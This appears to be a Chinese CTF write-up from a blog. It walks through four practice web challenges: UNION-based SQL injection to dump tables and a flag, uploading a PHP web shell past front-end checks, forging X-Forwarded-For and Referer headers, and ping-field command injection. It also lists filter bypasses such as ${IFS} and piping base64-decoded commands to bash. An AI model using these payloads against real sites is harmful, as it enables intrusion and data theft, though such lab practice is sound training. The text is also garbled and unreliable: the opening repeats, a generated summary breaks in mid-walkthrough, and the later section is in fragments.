
一:Newscenter
打开页面如图所示。

经过尝试,在输入框中输入数字可得到不同内容。

输入 23 则没有新闻返回。

由此推断输入框与数据库存在交互,可能涉及 SQL 注入。发现将数据库中所有查询内容都回显出来,确认考察点为 SQL 注入。

字段长度为 3。
23' order by 3 #

回显字段有 2, 3。
23' union select 1,2,3 #

数据库名为 news。
23
综述由AI生成通过四个实战案例演示了常见 Web 漏洞的利用方法。包括 Newscenter 中的 SQL 联合查询注入获取数据库信息;upload1 中绕过前端验证上传 PHP 文件;Xff_referer 中伪造 HTTP 头(XFF 和 Referer)突破 IP 限制;Command_execution 中利用命令分隔符执行系统指令读取 Flag。文章总结了各漏洞的考察点、解题思路及防御建议,强调使用预编译语句、白名单机制及安全 API 的重要性。


打开页面如图所示。

经过尝试,在输入框中输入数字可得到不同内容。

输入 23 则没有新闻返回。

由此推断输入框与数据库存在交互,可能涉及 SQL 注入。发现将数据库中所有查询内容都回显出来,确认考察点为 SQL 注入。

字段长度为 3。
23' order by 3 #

回显字段有 2, 3。
23' union select 1,2,3 #

数据库名为 news。
23

表名如下。
23' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="news" #

根据表名查询列名。
23' union select 1,group_concat(column_name),3 from information_schema.columns where table_name="secret_table" #

成功拿到 flag。
23' union select 1,fl4g,3 from secret_table #

发现有提示框提示需要上传图片,说明是前端验证。

关闭提示框后,直接上传一张 php 文件即可。

使用蚁剑连接即可成功拿到 flag。

打开页面提示 IP 必须为 123.123.123.123,需伪造 IP 头即 X-Forwarded-For 字段。

使用 Burp Suite 抓包。
输入 X-Forwarded-For:123.123.123.123 进行伪造
发送后又提示来源为 google,来源字段是 Referer。

伪造 Referer 字段。

打开页面为 ping 功能,先随便 ping 一下查看能否查看其他数据。

Ping 127.0.0.1 发现可以,填写 payload:127.0.0.1 | ls。

成功执行 ls,说明没有任何过滤。接下来查找 flag。

执行 127.0.0.1 |find / -name "fl*"。
发现文件如下。

成功拿到 flag。

考察点
解题思路
',观察是否存在报错。ORDER BY 确定查询字段数(如 ' ORDER BY 3--)。' UNION SELECT 1,2,database()-- 获取数据库名。information_schema.tables)、列名,最终读取 flag 字段。关键技术
information_schema 数据库获取元数据。防御建议
考察点
解题思路
.php,并抓包修改 Content-Type 为 image/jpeg。.htaccess 文件设置解析规则(如 AddType application/x-httpd-php .jpg)。关键技术
up.php.phtml)。test.php.xxx)。防御建议
考察点
X-Forwarded-For(XFF)和 Referer 头绕过访问控制。解题思路
X-Forwarded-For: 127.0.0.1 伪装本地 IP。Referer 为题目指定域名(如 http://www.google.com)通过验证。关键技术
防御建议
考察点
解题思路
127.0.0.1; ls 尝试执行命令。${IFS} 或 %09(Tab 的 URL 编码)。ca\t 或 base64 编码命令(如 echo "Y2F0IGZsYWc=" | base64 -d | bash)。cat 或 tac 命令读取 flag 文件。关键技术
;、&、|、||。cat fla*。防御建议
subprocess 模块)替代直接执行命令。
微信公众号「极客日志V2」,在微信中扫描左侧二维码关注。展示文案:极客日志V2 zeeklog
将字符串编码和解码为其 Base64 格式表示形式即可。 在线工具,Base64 字符串编码/解码在线工具,online
将字符串、文件或图像转换为其 Base64 表示形式。 在线工具,Base64 文件转换器在线工具,online
将 Markdown(GFM)转为 HTML 片段,浏览器内 marked 解析;与 HTML转Markdown 互为补充。 在线工具,Markdown转HTML在线工具,online
将 HTML 片段转为 GitHub Flavored Markdown,支持标题、列表、链接、代码块与表格等;浏览器内处理,可链接预填。 在线工具,HTML转Markdown在线工具,online
通过删除不必要的空白来缩小和压缩JSON。 在线工具,JSON 压缩在线工具,online
将JSON字符串修饰为友好的可读格式。 在线工具,JSON美化和格式化在线工具,online